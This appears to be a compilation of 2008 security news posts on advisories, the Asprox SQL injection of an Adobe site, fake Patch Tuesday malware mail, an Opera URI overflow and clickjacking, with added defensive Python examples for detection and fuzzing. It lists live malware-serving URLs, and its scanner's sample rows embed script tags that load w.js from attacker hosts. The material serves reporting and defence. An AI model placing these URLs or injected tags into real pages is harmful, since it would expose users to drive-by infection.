Security Bloggers Meeting at RSA Europe 2008 (updated)



Kevin Riggins from Infosecramblings proposed a Security Bloggers/Twits meeting during the RSA Europe 2008 conference on Tuesday the 28th of October at 8 PM.

The location hasn't been set yet. If you are interested in joining us, drop a message with Kevin.

UPDATE: It's final: Tuesday the 28th at 8:00 PM. The Novotel London Excel bar is the location. More info here.

(Photo under creative commons from ggee's photostream)

[Source:security4all]

Microsoft updates security advisory for local exploit for Windows Server



Microsoft updated Security Advisory (951306) last week. The vulnerability, known since last April, allows local privilege escalation. The advisory was updated because exploit code is now available online. There is currently no patch available, but a workaround is possible:

Microsoft is investigating new public reports of a vulnerability which could allow elevation of privilege from authenticated user to LocalSystem, affecting Windows XP Professional Service Pack 2, Windows XP Professional Service Pack 3, and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008. Customers who allow user-provided code to run in an authenticated context, such as within Internet Information Services (IIS) and SQL Server, should review this advisory. Hosting providers may be at increased risk from this elevation of privilege vulnerability.

Microsoft is aware that exploit code has been published on the Internet for the vulnerability addressed by this advisory. Our investigation of this exploit code has verified that it does not affect customers who have applied the workarounds listed below on their computers. Currently, Microsoft is not aware of active attacks that use this exploit code or of customer impact at this time. However, Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through a service pack, our monthly security update release process, or an out-of-cycle security update, depending on customer needs.

(Source: Microsoft Technet)

Secunia: popular security suites failing to block exploits

In a recently conducted comparative review, Danish security company Secunia tested the detection rate of 12 different Internet Security Suites against 300 exploits (144 malicious files and 156 malicious web pages) affecting popular end-user applications, and found that even the top performer in the test performs poorly in general. Their conclusion:

“These results clearly show that the major security vendors do not focus on vulnerabilities. Instead, they have a much more traditional approach, which leaves their customers exposed to new malware exploiting vulnerabilities.

While we did expect a fairly poor performance in this field, we were quite surprised to learn that this area is more or less completely ignored by most security vendors. Some of the vendors have taken other measures to try to combat this problem. One is Kaspersky who has implemented a feature very similar to the Secunia PSI, which can scan a computer for installed programs and notify the user about missing security updates. BitDefender also offers a similar system, albeit this is more limited in scope than the one offered by Kaspersky and Secunia. We do, however, still consider it to be the responsibility of the security vendors to be able to identify threats exploiting vulnerabilities, since this is the only way the end user can learn about where, when, and how they are attacked when surfing the Internet.”

And while it’s boring to scroll through the empty tables of the study, is Secunia’s report a frontal attack against the security software vendors’ inability to block exploits, or are they trying to emphasize the fact that end users should make better-informed purchasing decisions when relying on all-in-one security products?

In 2007, Secunia released data indicating that 28% of all installed apps are insecure, and despite the vulnerabilities having already been addressed, end users were still living in the reactive-response world. Cybercriminals, on the other hand, took notice, and following either common sense or publicly obtainable data indicating that end users remain susceptible to already patched vulnerabilities, started integrating outdated exploits into what was to become one of the main growth factors for web malware in the face of today’s ubiquitous web malware exploitation kits.

A year later, another study confirmed this fact and pointed out that one of the most effective vehicles for the success of web malware, the insecure web browser, remains largely ignored by millions of Google users. So, theoretically, the more traffic the malicious attackers acquire and redirect to their exploit-serving domains, the higher the probability of a successful infection with a piece of malware that standard signature-based scanning does not detect, which is exactly what they have been doing throughout 2007 and 2008.

What is more important, to detect the latest malware binary behind the exploit serving file, or prevent the latest malware binary from reaching the end user/company by blocking the relatively static exploit serving file? It’s all a matter of perspective.

Naturally, the comparative review and the methodology used are already receiving criticism from the vendors. Sunbelt Software’s Alex Eckelberry comments on the report, and also includes AV-Test.org’s Andreas Marx’s opinion on why it’s important to prioritize:

“In most cases, it is simply not practical to scan all data files for possible exploits, as it would slow down the scan speed dramatically. Instead of this, most companies focus on some widely used file-based exploits (like the ANI exploits) and some companies also remove the detection of such exploits after some time has passed by (as most users should have patched their systems in the meantime and in order to avoid more slow-downs). There are a lot more practical solutions built into security suites, like the URL filter (which checks and blocks known URLs which are hosting malware or phishing websites) and the exploit filter in the browser (which would also block access to many “bad” websites). Some tools also have virtualization and buffer/stack/heap overflow protection mechanisms included, too.

Then we have the traditional “scanner” — and even if some exploit code gets executed, a HIPS, IDS or personal firewall system might be able to block the attack. For example, some security suites know that Word, Excel or WinAmp won’t write EXE files to disk — so potentially dropped malware cannot get executed and the system is left in a “good” state.”

Emphasizing defense-in-depth, and prioritizing the blocking of the most popular exploits in use, is a very good point, since it has the potential to protect as many customers as possible from the default set of exploits used in the majority of malware attacks. For instance, the massive SQL injection attacks that took place during the last couple of months all relied on a relatively static JavaScript file, whose generic detection is a good example of prioritizing. Moreover, due to the evident template-ization of malware-serving sites and the commoditization of web malware exploitation kits, ensuring that your customers are protected from the default sets of exploits included in these kits means that your customers will be protected from a huge percentage of web-based malware attacks.

No Internet Security Suite can protect you from yourself, so do yourself and the Internet a favor - patch all your insecure applications - it’s free.

[Source: zdnet]

Adobe’s Serious Magic site SQL Injected by Asprox botnet

According to SophosLabs, Adobe-owned seriousmagic.com has been automatically SQL injected by the Asprox botnet, becoming the latest in a series of high-profile legitimate web sites injected with links to exploit- and malware-serving sites:

“The infection, which resides at hxxp://www.seriousmagic.com/help/tuts/tutorials.cfm?p=1, instructs users’ browsers to silently install a malicious file from a series of domains known to host attack sites. Adobe announced its acquisition of Serious Magic two years ago and whois records indicate the company is the owner of the seriousmagic.com domain.

According to this post from anti-virus provider Sophos, Adobe was notified of the infected page on Friday. The Register visited the link (using a virtual machine, of course) on Thursday and found it was still trying to redirect users to a series of nefarious sites including hxxp://abc.verynx.cn/ w.js and hxxp://1.verynx.cn/w.js. While those links no longer appeared to be active, two other sites used in the attack, hxxp://jjmaobuduo.3322.org/csrss/ w.js and hxxp://www2.s800qn.cn/csrss/ new.htm, were still active at time of writing.”

With the Asprox botnet making an appearance at the sites of Redmond magazine and Sony PlayStation in May and June respectively, seriousmagic.com is once again among the several hundred sites injected with the same malicious domains. Let’s take a peek at this malware campaign and see where it ends.

In short, every tutorial entry is SQL injected with a malicious domain, which means that if there are 60 tutorial entries, the malicious JavaScript loads 60 times, ending up in an endless loop of redirections to other malware and advertising-revenue-earning domains set up in this campaign. More specifically, the malicious w.js attempts to execute a multitude of already patched client-side exploits, using the following structure, and ultimately leads to a copy of Worm.Win32.AutoRun.qtg with a high detection rate (29 of 36 AV scanners detect it, 80.56%):

www2.s800qn.cn /csrss/ new.htm
www2.s800qn.cn /csrss/ flash.htm
www2.s800qn.cn /csrss/ i1.htm
www2.s800qn.cn /csrss/ f2.htm
www2.s800qn.cn /csrss/ i1.html
www2.s800qn.cn /csrss/ flash112.htm
www2.s800qn.cn /csrss/ ff.htm
www2.s800qn.cn /csrss/ xl.htm
www2.s800qn.cn /csrss/ mi.htm
www2.s800qn.cn /csrss/ real10.htm
www2.s800qn.cn /csrss/ real11.htm
bbexe.com /csrss/ rondll32.exe

Despite Adobe’s delayed response and the fact that the domains are still active, they seem to have solved the issue by redirecting all traffic from the site to the clean adobe.com.
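The campaign above appends one script tag per tutorial row, so the same foreign host shows up across many rows of a content table. As an added example (not part of the original post or of Sophos’ analysis), this scanner walks text columns for script tags, groups offending rows by host, ignores relative paths and allowlisted hosts, and can strip the injected tags again; the rows are constructed sample data, and the two hosts are the ones quoted in the post.

```python
"""Scanner for mass-SQL-injection script tags in stored content (added example)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Matches a <script ... src=...> opening tag, quoted or unquoted, plus an
# optional closing </script>, so the whole injected fragment can be removed.
SCRIPT_TAG = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?P<q>[\"']?)(?P<src>[^\"'\s>]+)(?P=q)[^>]*>"
    r"\s*(?:</script\s*>)?",
    re.IGNORECASE,
)

# Constructed sample rows shaped like a tutorials table: (id, html_body).
SAMPLE_ROWS = [
    (1, "Capturing video<script src=http://www2.s800qn.cn/csrss/w.js></script>"),
    (2, 'Keying a green screen<script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>'),
    (3, "Exporting to DVD"),
    (4, "Using the timeline <script src='/js/tutorial.js'></script>"),
    (5, "Adding titles<script src=http://www2.s800qn.cn/csrss/w.js></script>"),
]


def injected_hosts(rows, allowed_hosts):
    """Map each non-allowlisted script host to the row ids carrying it."""
    by_host = defaultdict(list)
    for row_id, text in rows:
        for m in SCRIPT_TAG.finditer(text):
            host = urlsplit(m.group("src")).hostname
            if host is None:
                continue  # relative path: served by this site, not injected
            if host not in allowed_hosts:
                by_host[host].append(row_id)
    return dict(by_host)


def strip_injected(text, bad_hosts):
    """Remove script tags pointing at the given hosts; leave everything else."""
    def repl(m):
        host = urlsplit(m.group("src")).hostname
        return "" if host in bad_hosts else m.group(0)
    return SCRIPT_TAG.sub(repl, text)


if __name__ == "__main__":
    hits = injected_hosts(SAMPLE_ROWS, {"www.seriousmagic.com"})
    for host, ids in hits.items():
        print(f"{host}: rows {ids}")
    for row_id, text in SAMPLE_ROWS:
        print(row_id, strip_injected(text, set(hits)))
```

A host that appears in many rows at once is the signature of an automated injection rather than a single defaced page, which is the cue to audit the query that accepts the tutorial id.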

[Source: zdnet]

Adobe ships fix for clickjacking, clipboard hijack threats

Adobe has released Flash Player 10 (Techmeme discussion) chock-full of major security improvements, including patches and mitigations for at least five serious security vulnerabilities.

The vulnerabilities covered with Flash Player 10 could allow an attacker to bypass the software’s security controls, Adobe warned.

From Adobe’s advisory:

  • Potential vulnerabilities have been identified in Adobe Flash Player 9.0.124.0 and earlier that could allow an attacker who successfully exploits these potential vulnerabilities to bypass Flash Player security controls. Adobe recommends users update to the most current version of Flash Player available for their platform. Due to the possibility that these security enhancements and changes may impact existing content, customers are advised to review this Adobe Developer Center article to determine if their content will be impacted, and to begin implementing necessary changes immediately to help ensure a seamless transition.

These include the previously covered clickjacking threat and clipboard hijack attacks.

A patch for Flash Player 9, which is vulnerable to these attack scenarios, is not yet available. Apple says that patch is currently scheduled for early November.

A second “critical” bulletin was also released for Flash CS3 Professional to cover a code execution vulnerability.

  • An attacker would need to convince a user to open a malicious SWF file to successfully exploit the issues. Adobe recommends that developers exercise caution when receiving unsolicited or suspicious SWF files. These issues do not affect Flash CS4 Professional. These issues do not affect the Mac version of Flash CS3 Professional.

* Image source: annia316’s Flickr photostream (Creative Commons 2.0)

[Source: zdnet]

Fake Microsoft Patch Tuesday malware campaign spreading

Malicious attackers are once again taking advantage of event-based social engineering attacks, and are currently mass-mailing fake notifications for Microsoft’s Patch Tuesday, attaching a copy of Trojan.Backdoor.Haxdoor next to a legitimate-looking PGP signature which is, of course, fake too:

“We received some questions from customers about an e-mail that’s circulating that claims to be a security e-mail from Microsoft. The e-mail comes with an attached executable, which it claims is the latest security update, and encourages the recipient to run the attached executable so they can be safe. While malicious e-mails posing as Microsoft security notifications with attached malware aren’t new (we’ve seen this problem for several years) this particular one is a bit different in that it claims to be signed by our own Steve Lipner and has what appears to be a PGP signature block attached to it. While those are clever attempts to increase the credibility of the mail, I can tell you categorically that this is not a legitimate e-mail: it is a piece of malicious spam and the attachment is malware. Specifically, it contains Backdoor:Win32/Haxdoor.”

Is timing everything when it comes to the success rate of such malware campaigns? Not necessarily.

Despite the touches meant to improve the trust factor (mentioning a real Microsoft employee, spoofing the FROM field as securityassurance AT microsoft.com, and the PGP signature), the emails aren’t personalized, and spam outbreaks spreading malware by capitalizing on Microsoft’s brand follow a cyclical pattern, reappearing every year (2005, 2007, 2008), so the average end user is expected to have a basic security awareness of this tactic. More info on the campaign:

Furthermore, this backdoor opens several TCP ports that allow remote attackers to connect to the compromised PC and execute files, steal information from it, or upload and download files. The attachment’s file name varies, but uses the convention KBxxxxxx.exe, where xxxxxx is a random 6-digit number. Below are some of the file names we’ve seen being used:

KB199250.exe
KB246586.exe
KB535548.exe
KB572906.exe
KB763412.exe
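The indicators above (a microsoft.com sender, an executable attachment named KBxxxxxx.exe, and a pasted PGP block) are enough to triage such mail at the gateway. As an added example (not code from the original post or from Microsoft), this helper builds a constructed lookalike message with an inert attachment and scores it on those indicators; the sender address and file names are the ones quoted in the post.

```python
"""Triage helper for the fake Patch Tuesday mails (added example)."""
import email
import re
from email import policy
from email.message import EmailMessage

# File name convention the campaign uses: KB plus six random digits.
KB_EXE = re.compile(r"^KB\d{6}\.exe$", re.IGNORECASE)


def build_sample(attachment_name="KB246586.exe"):
    """Construct a lookalike notification; pass None for a clean one."""
    msg = EmailMessage()
    msg["From"] = "Microsoft Security <securityassurance@microsoft.com>"
    msg["To"] = "user@example.com"
    msg["Subject"] = "Security Update for Microsoft Windows"
    if attachment_name is None:
        msg.set_content("Bulletins are published at the Microsoft Security site.\n")
        return msg.as_bytes()
    body = (
        "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n"
        "Please run the attached update to keep your system safe.\n"
        "-----BEGIN PGP SIGNATURE-----\n"
        "(constructed placeholder, not a real signature)\n"
        "-----END PGP SIGNATURE-----\n"
    )
    msg.set_content(body)
    # Inert bytes standing in for the dropper (a PE header stub only).
    msg.add_attachment(b"MZ" + b"\x00" * 30, maintype="application",
                       subtype="octet-stream", filename=attachment_name)
    return msg.as_bytes()


def triage(raw):
    """Return a verdict dict: malicious flag, reasons, attachment names."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    reasons = []
    sender = (msg.get("From") or "").lower()
    claims_microsoft = "microsoft.com" in sender

    attachments = [p.get_filename() or "" for p in msg.iter_attachments()]
    executables = [n for n in attachments if n.lower().endswith(".exe")]
    kb_named = [n for n in executables if KB_EXE.match(n)]

    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    pasted_pgp = "BEGIN PGP SIGNATURE" in text

    if claims_microsoft and executables:
        # Microsoft ships updates through Windows Update and bulletins, never
        # as mailed executables, so this pairing alone is decisive.
        reasons.append("executable attached to mail claiming microsoft.com origin")
    if kb_named:
        reasons.append("attachment follows the KBxxxxxx.exe campaign naming")
    if pasted_pgp and claims_microsoft and executables:
        # A signature block in the body is decoration; nothing here verified it.
        reasons.append("unverified PGP block used to lend credibility")
    return {"malicious": bool(reasons), "reasons": reasons, "attachments": attachments}


if __name__ == "__main__":
    print(triage(build_sample()))
    print(triage(build_sample(None)))
```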

Compared to the recent targeted malware attack against U.S. schools, and the massive fake CNN news items campaign taking advantage of client-side vulnerabilities, this one is definitely going to have a lower success rate - no matter the timing.

[Source: zdnet]

Lead, melamine, and backdoored routers

It seems that not a day goes by without a new media alert regarding bad things in the Chinese supply chain. First it was lead in our toys, then it was melamine in our milk, and now it also may be backdoors in our counterfeit Cisco hardware.

A recent BusinessWeek article discusses a criminal prosecution from late 2007 that raised the possibility that counterfeit Cisco routers have made their way into the western supply chain. Purchasers apparently include several government agencies and contractors, including branches of the military.

While counterfeit products may be a major economic concern, they also present a vector for foreign concerns to inject backdoors into critical infrastructure. This scenario is rather unlikely, as it would be far more cost effective for an attacker to compromise desktop systems using social engineering and trojans than it would be to create a trojaned router. Nevertheless, the possibility pushed the FBI to launch Operation Cisco (Cylon?) Raider in an effort to clamp down on the sale of counterfeit routers.

Unlike toys and food, performing an in-depth analysis of what goes into these routers would be expensive and possibly imperfect. Much like the apocryphal story of the CIA-initiated Soviet oil pipeline sabotage, we may never know if these mongrel devices were either pure clones or something more sinister.

[Source: zdnet]

MS Patch Tuesday heads-up: 11 bulletins, 4 critical

It will be a very busy Patch Tuesday for administrators managing Microsoft Windows computer systems.

According to Microsoft’s advance notice mechanism, 11 security bulletins will drop next Tuesday (October 14, 2008), covering a wide range of serious vulnerabilities.

Four of the 11 bulletins are rated “critical,” meaning that those vulnerabilities can be exploited to launch remote code execution attacks.


[ SEE: Microsoft makes daring vulnerability sharing move ]

The four “critical” bulletins apply to the widely deployed Internet Explorer browser, Active Directory, Microsoft Excel and Host Integration Server.

Six of the bulletins will be rated “important” and will provide fixes for a range of Microsoft Windows operating system vulnerabilities.

The final bulletin, rated “moderate,” will provide patches for an information disclosure bug in Microsoft Office.

This month will see the first appearance of the previously announced Exploitability Index, a new Microsoft initiative aimed at attempting predictions on whether exploit code will be released.

This index will attempt to predict if a vulnerability is likely to have functioning exploit code released, or have inconsistent exploit code released that wouldn’t work every time an attacker attempted to use it. We’ll even highlight vulnerabilities where we think it’s unlikely that functioning exploit code will ever be released.

Starting this month, Microsoft will also start sharing details on software vulnerabilities with security vendors ahead of Patch Tuesday under a new program aimed at reducing the window of exposure to hacker attacks.

The new Microsoft Active Protections Program (MAPP) will give anti-virus, intrusion prevention/detection and corporate network security vendors a headstart to add signatures and filters to protect against Microsoft software vulnerabilities.

* Image source: jeffwilcox’s Flickr photostream (Creative Commons 2.0)

[Source: zdnet]

Mac OS X Patch Day: 40 security flaws fixed

Apple has shipped another whopper of a patch to cover a total of 40 documented vulnerabilities affecting the Mac OS X ecosystem.

Security Update 2008-007, available for Tiger and Leopard, covers a range of third-party components and Mac OS X flaws that could put users at risk of remote code execution attacks.

The more serious vulnerabilities include:

  • Apache (CVE-2007-6420, CVE-2008-1678, CVE-2008-2364): Apache is updated to version 2.2.9 to address several vulnerabilities, the most serious of which may lead to cross site request forgery. Note: Apache version 2 is bundled with Mac OS X Server v10.4.x systems, but is not active by default.
  • ClamAV (CVE-2008-1389, CVE-2008-3912, CVE-2008-3913, CVE-2008-3914): Multiple vulnerabilities exist in ClamAV 0.93.3, the most serious of which may lead to arbitrary code execution.
  • ColorSync (CVE-2008-3642): A buffer overflow exists in the handling of images with an embedded ICC profile. Opening a maliciously crafted image with an embedded ICC profile may lead to an unexpected application termination or arbitrary code execution.
  • CUPS (CVE-2008-3641): A range checking issue exists in the Hewlett-Packard Graphics Language (HPGL) filter, which may cause arbitrary memory to be overwritten with controlled data. If Printer Sharing is enabled, a remote attacker may be able to cause arbitrary code execution with the privileges of the ‘lp’ user. If Printer Sharing is not enabled, a local user may be able to obtain elevated privileges.
  • libxslt (CVE-2008-1767): A heap buffer overflow issue exists in the libxslt library. Viewing a maliciously crafted HTML page may lead to an unexpected application termination or arbitrary code execution.
  • MySQL Server (CVE-2007-2691, CVE-2007-5969, CVE-2008-0226, CVE-2008-0227, CVE-2008-2079): MySQL is updated to version 5.0.67 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution.
  • PHP (CVE-2007-4850, CVE-2008-0674, CVE-2008-2371): PHP is updated to version 4.4.9 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution.
  • PSNormalizer (CVE-2008-3647): A buffer overflow exists in PSNormalizer’s handling of the bounding box comment in PostScript files. Viewing a maliciously crafted PostScript file may lead to an unexpected application termination or arbitrary code execution.
  • QuickLook (CVE-2008-4211): A signedness issue exists in QuickLook’s handling of columns in Microsoft Excel files that may result in an out-of-bounds memory access. Downloading or viewing a maliciously crafted Microsoft Excel file may lead to an unexpected application termination or arbitrary code execution.

[Source: zdnet]

Opera bitten by ‘extremely severe’ browser bug

Buried in the flurry of feature-related news surrounding the release of Opera 9.6 is the fact that the update fixes an “extremely severe” vulnerability that could expose Opera users to code execution attacks.

According to an Opera advisory, which is not mentioned anywhere in Opera’s giddy press release, there’s a patch out for an issue where specially crafted addresses could execute arbitrary code.

Here’s how Opera describes the vulnerability, which was discovered and reported by Matasano’s Chris Rohlf:

If a malicious page redirects Opera to a specially crafted address (URL), it can cause Opera to crash. Given sufficient address content, the crash could cause execution of code controlled by the attacking page.

Rohlf has more details on the Matasano Chargen blog:

In this case the vulnerability is based on a ‘specially crafted URI’ which of course can be triggered by any attacker-controlled content. It is reproducible on both x86 Linux and Win XP SP2 and Vista.

This flaw was found using some rudimentary fuzzing, simple stuff really. I basically whipped up a few lines of JavaScript to create different URIs with incrementing string lengths (yes I’m serious). And thanks to Immunity Debugger I was able to boil it down to a heap overflow in no time.

The offending URI was ‘http://BBB*BBB:password@example.com’. This took minimal effort to find and underscores the importance of simple fuzzing test cases being built into your SDLC.
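The length sweep Rohlf describes is the kind of test case that belongs in an SDLC for any component that parses addresses. As an added example (not Rohlf’s code and not Opera’s), this harness generates the advisory’s URI shape, http://<user>:password@example.com, with the user component growing one character at a time, hands each URI to a parser callable, and records any exception or any parse whose host is no longer example.com. urllib.parse is used only as a stand-in target to show a clean run; naive_host is a constructed parser with a fixed-size buffer so the sweep has something to find.

```python
"""Length-sweep URI fuzzing harness for parser robustness testing (added example)."""
from typing import Callable, Iterator, List, Tuple
from urllib.parse import urlsplit


def gen_uris(start=1, stop=4096, step=1, fill="B") -> Iterator[Tuple[int, str]]:
    """Yield (user_length, uri) with the user component growing each step."""
    for n in range(start, stop + 1, step):
        yield n, f"http://{fill * n}:password@example.com"


def run_length_sweep(parse: Callable[[str], str], stop=4096, step=1) -> List[Tuple[int, str]]:
    """Return (user_length, problem) pairs; an empty list is a clean run."""
    findings = []
    for n, uri in gen_uris(stop=stop, step=step):
        try:
            host = parse(uri)
        except Exception as exc:  # a crash at some length is what the sweep hunts
            findings.append((n, f"{type(exc).__name__}: {exc}"))
            continue
        if host != "example.com":
            # No crash, but the authority was misread: same bug class, quieter symptom.
            findings.append((n, f"host misparsed as {host!r}"))
    return findings


def stdlib_host(uri: str) -> str:
    """Target A: the standard library parser, expected to stay clean."""
    return urlsplit(uri).hostname or ""


NETLOC_BUF = 64  # constructed: models a fixed-size buffer for the authority part


def naive_host(uri: str) -> str:
    """Target B: constructed parser that copies the authority into a fixed
    buffer and silently truncates, the way a C parser using strncpy might."""
    authority = uri.split("://", 1)[1].split("/", 1)[0][:NETLOC_BUF]
    _userinfo, _, host = authority.rpartition("@")
    return host


if __name__ == "__main__":
    print("urllib.parse findings:", run_length_sweep(stdlib_host, stop=512))
    hits = run_length_sweep(naive_host, stop=100)
    print("naive parser: first finding at user length", hits[0][0] if hits else None)
```

The sweep reports the first user length at which the truncating parser loses the host, which is exactly the boundary a memory-safety bug would sit at in native code.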

The Opera 9.6 update also fixes a second security bug reported by ex-Zero Day blogger Nate McFeters.

Opera rates this bug as “highly severe” and warns that Java applets can be used to read sensitive information:

Once a Java applet has been cached, if a page can predict the cache path for that applet, it can load the applet from the cache, causing it to run in the context of the local machine. This allows it to read other cache files on the computer or perform other normally more restrictive actions. These files could contain sensitive information, which could then be sent to the attacker.

[Source: zdnet]

Asus ships Eee Box PCs with malware

Asus has confirmed and apologized to customers (press release in Japanese; translated version) for shipping malware on the recently introduced Eee Box desktop computer:

“According to an email sent out by Asus, PC Advisor reports, the Eee Box’s 80GB hard drive has the recycled.exe virus files hidden in the drive’s D: partition. When the drive is opened, the virus activates and attempts to infect the C: drive and any removable drives connected to the system. According to Symantec, the malware is likely to be the W32/Usbalex worm, which creates an autorun.inf file to trigger recycled.exe from D:. Separately, we’ve been testing the Eee Box this week, and discovered our review unit came loaded with the W32/Taterf worm - aka W32.Gammima.AG, aka kavo.exe malware that sniffs out online gaming usernames and passwords.”

Which models are known to carry the malware according to Asus?

The company has already identified the following models with their associated UPC codes:

Model number: EEEBOXB202-B; UPC code: 610839761807
Model number: EEEBOXB202-W; UPC code: 610839761814
Model number: EBXB202BLK/VW161D; UPC code: 610839530526
Model number: EBXB202WHT/VW161D-W; UPC code: 610839531202
Model number: EBXB202BLK/VK191T; UPC code: 610839547753

In addition to last month’s Asus fiasco when they accidentally shipped cracking tools and confidential documents on recovery DVDs, the company is among the increasing number of companies that have shipped malware on their products during the last couple of years - Apple (2006), TomTom (2007), Seagate (2007), and HP (2008).

[Source: zdnet]

Adobe posts workaround for clickjacking flaw, NoScript releases ClearClick

Following the recent release of a PoC demonstrating clickjacking in action, Adobe has released a security advisory offering solutions for customers and IT administrators on dealing with the flaw until it releases a Flash Player patch before the end of October.

“We have just posted a Security Advisory for Flash Player in response to recently published reports of a ‘Clickjacking’ issue in multiple web browsers that could allow an attacker to lure a web browser user into unknowingly clicking on a link or dialog. This potential ‘Clickjacking’ browser issue affects Adobe Flash Player’s microphone and camera access dialog. A Flash Player update to mitigate the issue will be available before the end of October. In the meantime, users can apply the workaround described in the Advisory.”

And since prevention is better than the cure — at least in the short term — the just released NoScript v1.8.2.1 aims to prove exactly that with its ClearClick feature:

“The most specific and ambitious is called ClearClick: whenever you click or otherwise interact, through your mouse or your keyboard, with an embedded element which is partially obstructed, transparent or otherwise disguised, NoScript prevents the interaction from completing and reveals the real thing to you in “clear”. At that point you can evaluate if the click target was actually the intended one, and decide whether to keep it locked or unlock it for free interaction. This comes in quite handy now that more dangerous usages of clickjacking are being disclosed, such as enabling your microphone or your webcam behind your back to spy on you through the interwebs.”

Click in the clear, and make sure you’re not susceptible to exploitation through last quarter’s security vulnerabilities.

[Source: zdnet]

Atrivo/Intercage’s disconnection briefly disrupts spam levels

After years of operation, California-based ISP Atrivo/Intercage, a well-known Russian Business Network darling, faced the music and was disconnected from the Internet by its upstream provider at the end of September. What happened, according to MessageLabs’ latest intelligence report, was a brief decline in spam because the malware-infected hosts couldn’t reach the ISP’s netblock. Logically, within the next couple of days Intercage’s customers switched the hosting locations of their botnets’ command and control servers, and cybercrime activity quickly got back to normal:

“Charged with providing a safe-haven for online scammers, cyber crooks and malware distributors, California-based ISP Intercage (aka Atrivo) was disconnected from the internet on September 20. Pacific Internet Exchange, Intercage’s upstream provider, terminated the service and after a few days, UnitedLayer, another service provider, agreed to host Intercage. But on September 25, after deciding Intercage still had too many on-going problems, UnitedLayer also terminated service.

It can be seen from the chart above that the botnet controllers are quick to respond to any degradation of their service, and can re-point their bots at a new command and control channel in a matter of days. Therefore MessageLabs expects this decline in spam to be short-lived, especially in anticipation of Halloween in October and Thanksgiving in the US in November, both of which are traditionally seasonal favorites for spammers.”

What’s particularly disturbing in Intercage’s case is not just the fact that it’s a U.S.-based ISP, which undermines the “lack of international cybercrime cooperation” excuse for not shutting it down earlier, but also that ATRIVO/Intercage’s uptime is a great example of how marginal thinking and the relatively long average time it takes to shut such providers down still keep their business in the game. How come? For the past year, ATRIVO/Intercage has had 10 different Internet Service Providers, so contrary to the common wisdom that being on the run is supposed to make your job harder, it doesn’t really matter, as the average time ATRIVO manages to remain online seems to be above its customers’ averages:

“The following graph shows that Atrivo has had 10 different Internet providers over the past year. The number of Renesys peers selecting each provider is shown over time. Most providers didn’t stick around for long, but a few like WV Fiber (AS 19151) did hang in there for much of the year. For a couple of days recently, Atrivo had zero providers and were hence effectively out of business, but then United Layer (AS 23342) became their latest — and currently only — provider. We’ll see how long this lasts and if others step up to provide Atrivo with some redundancy. Of course, those who are convinced Atrivo is up to no good can simply block access to their IP addresses (prefixes) as they have a relatively modest allocation.”

Do bullet-proof, cybercrime-friendly providers have a future? Naturally, since simple market forces are going to keep both fronts busy for years to come. With ATRIVO/Intercage now shut down, what’s next? Lessons learnt for the bad guys, who are realizing that it’s about time they start taking advantage of basic OPSEC (operational security) processes like decentralizing their networks and increasing the lifecycle of their customers’ cybercrime activities through fast-fluxing. The bottom line: even though Intercage remains offline, the concepts of cybercrime content hosting, and the Russian Business Network as a franchise, are always going to be there.

[Source: zdnet]

Zero day for Sun Solstice AdminSuite (sadmind)



A zero day disclosure is never a good thing, but people need to be aware when it happens. A vulnerability resides within a function of the Sun Solstice AdminSuite sadmind which, when properly exploited, can lead to remote compromise of the vulnerable system. This information was posted to the Full Disclosure mailing list 2 days ago, together with an exploit for Metasploit.

I checked the Sun Security advisories but I couldn't find any information (yet). Disable the port or service if you don't need it or try to shield it if you do. Put an ACL in place. Keep an eye on upcoming advisories for workarounds and patches.

[Source: security4all]

Webcam hijack demo highlights clickjacking threat

[ UPDATE: The details are out. Lots of unresolved clickjacking issues ]

A security researcher in Israel has released a demo of a “clickjacking” attack, using a JavaScript game to turn every browser into a surveillance zombie.

The release of the demo follows last month’s partial disclosure of the cross-platform attack/threat, which affects all the major desktop platforms — Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

[ SEE: Clickjacking: Scary new cross-browser exploit]

In Guy Aharonovsky’s demo game, a Web page is set up to seamlessly hide another page beneath the game: the Adobe Flash Player Settings Manager, which controls the target’s camera and microphone privacy settings.

Using a series of clicks bouncing around the rigged page, Aharonovsky is able to silently redirect the user’s clicks onto the hidden settings page, modify the Flash privacy settings and gain full access to the installed webcam.

The wet dream of every private eye and peeping tom. Imagine this scenario: you play a short game on the web and, by doing so, unknowingly grant someone full access to your webcam and microphone.

If you don’t want to try it or don’t have a webcam connected, you can see the attack in action in this YouTube video.

[ SEE: Firefox + NoScript vs Clickjacking ]

Aharonovsky’s harmless demo game is a perfect example of how clicks on one Web page can actually land on a page that is invisible to the end user. The webcam hijack could have been combined, for example, with live streaming sites like UStream or JustinTV to create a malicious surveillance platform, he explained.

The demo was done in the form of a JavaScript game, but Aharonovsky warns that a Flash, Java, Silverlight or DHTML game or application can be used to achieve the same thing.

Some of the clicks are real game clicks, others are jacked clicks. Every time a click needs to be jacked, the content simply moves behind the iframe using z-index.

I had doubts about publishing this, but if I could understand it, so can the bad guys, so it’s better to know about it.

Aviv Raff, a security researcher with expertise in browser hacking, has also built a proof-of-concept exploit that uses a hidden iframe to hijack clicks and snag Twitter followers.

Raff’s demo invisibly overlays a blank page on top of the Twitter site and places a “Click Me!” button on the spot where Twitter’s “Follow” button is displayed underneath. If the target is logged into Twitter, the click on Raff’s demo is actually executed on Twitter’s site.

The ramifications of this are truly scary and, as Google browser security guru Michal Zalewski explains, difficult to fix.

If you expand the idea behind these clickjacking demos, you can see how it could be exploited to make drive-by malware downloads easier to launch using social engineering techniques.

Until the affected vendors can come up with adequate patches/mitigations, Web surfers might want to follow Jeremiah Grossman’s advice and move to Firefox + NoScript to get some level of security.
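To make the overlay mechanics concrete, here is an added example, not code from the original post or from Aharonovsky’s or Raff’s demos, that models the geometry of a clickjacking page in plain JavaScript: a visible decoy button, an invisible iframe shifted so that the framed site’s real button lands exactly under the decoy, and the frame-busting check a framed page could run to defend itself. The coordinates, the target URL and the window objects handed to the defense are all constructed for the demo.

```javascript
// Added example: a model of a clickjacking page and the frame-busting defense.
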